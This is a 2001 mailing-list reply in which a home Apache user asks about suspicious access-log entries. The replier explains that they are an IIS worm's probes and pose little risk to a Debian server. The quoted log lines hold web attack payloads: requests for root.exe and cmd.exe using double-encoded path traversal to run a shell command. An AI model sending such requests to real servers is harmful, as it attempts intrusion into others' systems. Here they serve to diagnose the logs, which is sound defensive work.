Re: Being cracked? (need help on apache log files)
OSS> We just got our ADSL and now have a server running Apache on a potato box
OSS> at home. DynDNS provides us with dynamic dns.
OSS> Today I found these lines in my acces.log:
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HT
OSS> TP/1.0" 404 210
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP
OSS> /1.0" 404 208
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/
OSS> c+dir HTTP/1.0" 404 218
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/
OSS> c+dir HTTP/1.0" 404 218
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/sy
OSS> stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c
OSS> ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c
OSS> ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
OSS> and so on. To me it looks as if 213.145.168.244 is trying
OSS> to execute some file giving him root access. Are someone trying to
OSS> crack my machine? What should I do?
Ignore it. It is a worm which tries to hack IIS. Since you running
Debian + Apache you are hardly in danger.
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
| Ilya Martynov (http://martynov.org/) |
| GnuPG 1024D/323BDEE6 D7F7 561E 4C1D 8A15 8E80 E4AE BE1A 53EB 323B DEE6 |
| AGAVA Software Company (http://www.agava.com/) |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Reply to: